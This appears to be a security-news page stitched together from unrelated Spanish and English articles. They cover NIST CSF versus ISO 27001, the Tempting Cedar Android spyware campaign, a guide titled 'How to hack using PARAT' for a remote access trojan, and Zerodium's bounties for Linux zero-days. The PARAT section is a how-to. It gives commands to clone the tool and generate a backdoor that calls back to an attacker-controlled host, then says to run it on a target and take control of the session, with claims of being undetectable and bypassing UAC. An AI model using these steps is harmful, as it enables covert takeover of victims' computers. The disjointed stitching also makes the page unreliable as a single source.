¿CYBERSECURITY FRAMEWORK O ISO 27001?

Hace unos meses, el Instituto Nacional de Estándares y Tecnología (NIST por sus siglas en ingles) hizo una publicación para mejorar la seguridad cibernética de infraestructura crítica, conocido comúnmente como Cybersecurity Framework. Esto trajo muchas dudas si ya se está familiarizado con ISO 27001.

Cybersecurity Framework se diseñó inicialmente para las empresas de EE. UU. Que se consideran parte de la infraestructura crítica. No obstante, es adecuado para ser utilizado por cualquier organización que enfrenta riesgos de seguridad cibernética.

Por otro lado, ISO / IEC 27001 es una norma de seguridad cibernética publicada en 2005 y revisada en 2013. Si bien no es obligatorio, se acepta en la mayoría de los países como un marco principal para la implementación de la seguridad de datos. Describe el sistema de gestión de la seguridad de datos y sitúa la seguridad en el contexto de la gestión y los procesos generales de una empresa.

Tanto Cybersecurity Framework como ISO 27001 le brindan la metodología sobre cómo implementar la seguridad cibernética en una organización. Podría implementar cualquiera de estos. Probablemente la mayor similitud es que ambos se basan en la gestión del riesgo: esto significa que ambos requieren que las salvaguardas se implementen solo si se detectan riesgos de seguridad cibernética.

Cybersecurity Framework

Cybersecurity Framework claramente está mejor estructurado cuando se trata de planificación e implementación.

Framework Core está dividido en funciones; Identificar, Proteger, Detectar, Responder y Recuperar, y luego en 22 Categorías relacionadas, por ejemplo, Gestión de Activos, Gestión de Riesgos, etc. similares a las secciones en ISO 27001. 98 subcategorías, y para cada subcategoría se hacen varias referencias a otros marcos como ISO 27001, COBIT, NIST SP 800-53, ISA 62443 y CCS CSC. De esta manera, es muy fácil ver cuáles son los requisitos y dónde encontrar la manera de implementarlos.

Niveles de Implementación de Cybersecurity Framework; Parcial, informado de riesgo, repetible y adaptable. De esta manera, una empresa puede decidir fácilmente hasta dónde quiere llegar con su implementación, teniendo en cuenta los requisitos.

Entonces es el perfil del marco; Perfil actual, Perfil de destino y otros ayudan a las imágenes en las que se encuentra la organización en este momento, relacionadas con las categorías y subcategorías de Framework Core, y dónde quiere estar. Además, Framework Profiles podría usarse para establecer los requisitos mínimos para otras organizaciones como proveedores o socios. Esto no existe en ISO 27001

En general, Cybersecurity Framework permite que tanto la alta dirección como los ingenieros y demás personal de TI comprendan fácilmente qué se debe implementar y dónde están las vulnerabilidades.

ISO 27001

Una de las mayores ventajas de ISO 27001 es que las empresas pueden certificarse por ella, esto significa que una empresa puede demostrar a sus clientes, socios, accionistas, agencias gubernamentales y otros que pueden mantener su información segura.

Además, ISO 27001 es un estándar aceptado y reconocido internacionalmente: si una empresa desea demostrar su capacidad a sus clientes, socios y gobiernos fuera de su país, ISO 27001 será mucho mejor.

ISO 27001 se enfoca en proteger todo tipo de información, no solo la información procesada en los sistemas de TI. Es cierto que la información en papel tiene cada vez menos importancia, pero para algunas compañías tal información aún puede presentar riesgos significativos. ISO 27001 define qué documentos y registros son necesarios, y cuál es el mínimo que debe implementarse.

Finalmente, mientras que Cybersecurity Framework se enfoca solo en cómo planificar e implementar la seguridad cibernética, ISO 27001 adopta un enfoque mucho más amplio, su metodología se basa en el ciclo Planificar, Hacer, Verificar, Actuar (PDCA), lo que significa que construye el sistema de gestión que mantiene y mejora todo el sistema. Sin una medición constante, revisión, auditoría, acciones correctivas y mejoras, dicho sistema se deteriorará gradualmente y finalmente perderá su propósito.

Cual es mejor

Esto no debe ser una cuestión de uno u otro, me parece que sería mejor combinarlos. En realidad, Cybersecurity Framework sugiere que puede complementarse fácilmente con otro programa o sistema, e ISO 27001 ha demostrado ser un muy buen marco general para diferentes metodologías de seguridad de datos.

Por lo tanto, creo que se pueden lograr los mejores resultados si el diseño de la seguridad de datos completa se establece de acuerdo con ISO 27001 y utilizar Cybersecurity Framework en lo que respecta a la gestión de riesgos y la implementación de las áreas y salvaguardas de seguridad particulares.

HACKERS SPREAD ANDROID SPYWARE THROUGH FACEBOOK USING FAKE PROFILES

The Android spyware was used to steal personal data of victims – The campaign also shows why users should never use their real photos on Facebook.

There are almost 2 billion monthly active users on the social media giant Facebook and that makes it one of the most lucrative targets for hackers and cybercriminals. Recently, the researchers at Czech IT security researchers at Avast reported a sophisticated campaign in which attackers used Facebook and Facebook messenger to trick users into installing a highly sophisticated Android spyware.

HACKERS USED FAKE FACEBOOK PROFILES OF ATTRACTIVE FEMALES

The scam was reported to Avast by one of their customers informing about receiving messages on their Facebook messenger carrying strange looking links sent by unknown profiles going by the names of Alona, Christina, and Rita using images of attractive women.

Upon analyzing the scam, researchers quickly identified that the profiles used in the scam were fake, stolen images from real people and used without their knowledge or consent. The women lured the victim to click on the link and install the latest version of Kik Messenger app on their device in order to continue their “flirty conversations”.

The screenshot shows the link sent by hackers to their victims. (Credit: Avast)

However, the link only disguised as the Kik Messenger app, in reality, it would take victims to a “very convincing” phishing website and which hosted the malicious version of Kik Messenger app. Once installed, the spyware app would steal personal data from the device.

TEMPTING CEDAR SPYWARE & LEBANESE CONNECTION

Dubbed Tempting Cedar Spyware by Avast researchers, the attack aims at stealing personal data from victims Android devices including photos, contacts list, SMS, call logs, victims’ location and recording surrounding sounds including call conversations.

According to Avast, the operation has been targeting Android users since 2015 and so far it has hunted hundreds of victims in the Middle East. The most targeted victims were from Israel while a small number of victims were identified in China, France, Germany and the United States.

Based on the evidence such as login activity, IP addresses, Middle Eastern time zones, registrant data of domains used by hackers to distribute malware, Avast researchers believe that this campaign is being run from Lebonan. However, at the time of publishing this article, it was unclear if the Tempting Cedar Spyware campaign is still targeting users or it has been shut down.

“The cybercriminals behind the Tempting Cedar Spyware were able to install a persistent piece of spyware by exploiting social media, like Facebook, and people’s lack of security awareness, and were thus able to gather sensitive and private data from their victims’ phones including real-time location data which makes the malware exceptionally dangerous, concluded Avast.”

Just last month researchers at Lookout Security exposed a cyber espionage campaign called Dark Caracal in which attackers targeted thousands of victims across 21 countries. The researchers identified that the campaign is being run from Beirut, Lebanon from a building owned by the Lebanese General Directorate of General Security (GDGS).

PHOTOS USED BY FAKE PROFILES ON FACEBOOK

Avast has shared a few blurred photos used by hackers in the operation which indicates that social media users on any site should refrain from using their real photos. On Facebook, users should avoid using their photos as cover or profile photos and make sure their personal photos are only visible to their close friends.

Credit: Avast

HAMAS ONCE TARGETED IDF WITH SEDUCTIVE FEMALE IMAGES

This is not the first time when hackers have used photos of attractive women to trap their victims. In fact, this is not the first campaign in which Israeli users have been lured into installing spyware on their phone by hackers using fake photos of attractive women. In January 2017, Hamas was found hacking dozens of smartphones belonging to IDF (Israel Defense Forces) soldiers using tons of seductive female images on Facebook and tricking soldiers into downloading malware which stole their text messages photos, contacts, WhatsApp conversations and identified their location.

In a 2015 incident, hackers used photos of female IDF soldiers to target officials with Poison Ivy trojan and breached Israeli military servers to steal sensitive information. According to Israeli cybersecurity specialists, an unknown Lebanon-based political/governmental group was behind the campaign.

HOW TO HACK USING PARAT- REMOTE ACCESS TROJAN (RAT)?

According to cyber security specialist; a Remote Access Trojan (RAT) is a type of malware that controls a system via a remote network connection as if by physical access. While desktop sharing and remote administration have many legal uses, RAT is usually associated with criminal or malicious activity. A RAT is installed without the victim’s knowledge and will try to hide its operation from the victim and from the Anti Virus software.

PARAT is an open-source, multy-threaded, socket and python based remote administration tool. It mainly uses python in core and uses IPv4 for communication and self-encryption for your privacy.

PARAT has two versions:

• Local mode
• Remote mode

In the local mode, when you start PARAT using python2 main.py, you are redirect to local mode and there you can:

Control your local options, Change UI elements, Do edits, Use your unix shell, Set listen ports, and Generate backdoor, to mention some, but don’t forget some local commands are available also on remote mode.

You can get in remote mode only when you have connected connections, using sessions -c ID by replacing ID with targets valid identifier. Here the information security expert has full access to target machine and so can do remote actions.

Also, you can set local password for PARAT client and remote connections use self-encryption algorithm.

Although there have different and better options to handle multiplicity, they decide to use threading module for do this. The reason of this choice is that PARAT is a simple tool and designed just for educational proposes. They stop using more sophisticated implements in that aspect. It’s also necessary to point that you can listen to different ports at one time using this feature.

Just do these steps:

Enter PARAT main menu using python2 main.py

Make the backdoor use generate -i yourhost.ddns.net -p 4444 -o backdoor.pyw

Run backdoor.pyw on target

Play with target on remote mode, using sessions -c 1

Also listen on the port using listen -p your_port

Change log:

Compatible with both python 2 and 3 versions Copy and paste on your terminal:

git clone https://github.com/micle-fm/Parat&& cd Parat && python main.py

It may need to install python -m easy_install pypiwin32 on some targets.

Features

Fully UnDetectable (FUD)

Compatible with Telegram messanger

Windows Bypass User Account Control (UAC)

Memory executation

No any requirments to setup

Telegram

You can communicate PARAT using telegram messanger. For this do steps:

Open telegram.service file by an editor

Insert your bot token on line 15, replaced on YOUR_BOT_TOKEN

Run telegram.service by typing: python telegram.service

RECOMPENSAS DE ZERODIUM AUMENTAN A $45,000 POR VULNERABILIDADES ZERO-DAY DE LINUX

La compañía comercializadora de exploits privados está ampliando su alcance para adquirir errores en compilaciones Linux.

De acuerdo a informes de diversas empresas de seguridad informática, Zerodium está ofreciendo $ 45,000 a los hackers dispuestos a reportar de forma privada las vulnerabilidades zero-day en el sistema operativo Linux.

Hasta el día 31 de marzo, Zerodium está dispuesto a ofrecer mayores pagos a los expertos en seguridad informática, hasta $45,000 por exploits de tipo LPE.

Las vulnerabilidades de tipo zero-day deberían funcionar con instalaciones predeterminadas de Linux, como las versiones de Ubuntu, Debian, CentOS, Red Hat Enterprise Linux (RHEL) y Fedora.

Como sabemos muchos proveedores de tecnología, incluidos Google, Apple y Microsoft, ofrecen recompensas financieras por informes de vulnerabilidades, estos informes se utilizan para parchar el software y proteger los dispositivos de los usuarios. La empresa Zerodium es diferente a las compañías que buscan ayuda externa para descubrir vulnerabilidades.

La compañía compra vulnerabilidades en una amplia gama de dispositivos y sistemas de destino, como Microsoft Windows, Google Chrome, Android, Apple OS X y varios servidores de correo electrónico, para vender esta información de forma privada a los clientes; individualmente, a través de las firmas de investigación en seguridad informática o de empresas especializadas en exploits zero-day.

Colaboradores del Instituto Internacional de Seguridad Cibernética dicen, que los clientes pueden incluir agencias gubernamentales ya que requieren exploits para diversos fines, como el cifrado del dispositivo de última hora o la supervisión encubierta.

Zerodium ha ofrecido recompensas que alcanzaron más de un millón de dólares en el pasado. En el pasado, la compañía ofreció $ 1.5 millones a los expertos en seguridad informática para trabajar con exploits de iOS 10. Las recompensas aumentan dependiendo de la demanda del vendedor de exploits.

Según comunicados de empresas de seguridad informática como WebImprints, el año pasado, los gobiernos pidieron prohibiciones o puertas traseras obligatorias en aplicaciones cifradas y servicios de cifrado de extremo a extremo. Teniendo un cambio en las prioridades del gobierno, Zerodium aumentó los pagos de recompensas en 2017 hasta $500,000 por fallas zero-day en aplicaciones encriptadas, como iMessage, Telegram y WhatsApp.

El aumento en el precio de las vulnerabilidades de Linux sugiere que puede haber una gran demanda en el mercado en este momento. Zerodium generalmente ofrece hasta $ 30,000 a los investigadores en seguridad informática por una vulnerabilidad zero-day de Linux, pero con el fin de aumentar los envíos, ahora ha aumentado en $ 15,000.

En septiembre, Zerodium atrajo a los investigadores con pagos de $1 millón por exploits que trabajan contra el explorador Tor.